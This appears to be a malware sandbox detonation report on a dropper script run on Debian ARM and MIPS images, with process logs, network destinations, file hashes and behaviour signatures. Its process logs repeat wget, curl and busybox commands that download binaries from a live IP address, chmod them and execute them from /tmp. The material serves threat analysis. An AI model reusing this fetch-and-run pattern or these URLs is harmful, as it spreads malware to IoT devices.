[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-29 02:21

Reported

2024-10-29 02:23

Platform

debian9-armhf-20240611-en

Max time kernel

26s

Max time network

29s

Command Line

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A

Processes

/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-29 02:21

Reported

2024-10-29 02:23

Platform

debian9-mipsbe-20240611-en

Max time kernel

70s

Max time network

71s

Command Line

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
